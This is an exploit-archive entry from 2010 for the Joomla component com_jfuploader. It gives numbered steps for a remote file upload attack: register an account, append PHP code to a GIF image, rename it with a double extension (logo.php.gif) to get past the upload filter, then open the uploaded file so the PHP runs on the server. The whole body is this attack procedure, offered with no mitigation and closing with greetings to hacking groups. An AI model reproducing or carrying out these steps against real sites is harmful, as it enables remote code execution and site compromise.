[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_jfuploader Remote File Upload
# Published : 2010-10-30
# Author : Setr0nix
# Previous Title : Zomplog 3.9 Multiple XSS & XSRF Vulnerabilities
# Next Title : NinkoBB 1.3RC5 XSS Vulnerability
=========================================================================================================
[#] Type : Joomla Component com_jfuploader Remote File Upload
[#] Author : Setr0nix
[#] Home : www.Setr0nix.com
[#] Contact : Admin@Setr0nix.com
=========================================================================================================
[#] Exploit :
1. Register
2. http://127.0.0.1/index.php?option=com_jfuploader&Itemid=[Itemid]
3. Download One gif Image ( Example : http://www.google.com/images/logo.gif )
4. Open logo.gif In Notepad++ And Got to Last Line
5. Copy And Past You PHP Code After The Last Line ( Don't Delete Any Thing Of Image Code )
6. Save It , Ctrl + S
7. Rename logo.gif To logo.php.gif And Upload It From com_jfuploader
8. To Run Your Uploaded File Go To This Link : http://127.0.0.1/files/YourUsername/logo.gif.php
=========================================================================================================
[#] S T T :
All Iranian Hackers , Offensive Security , Inj3ct0r , SecurityReason
=========================================================================================================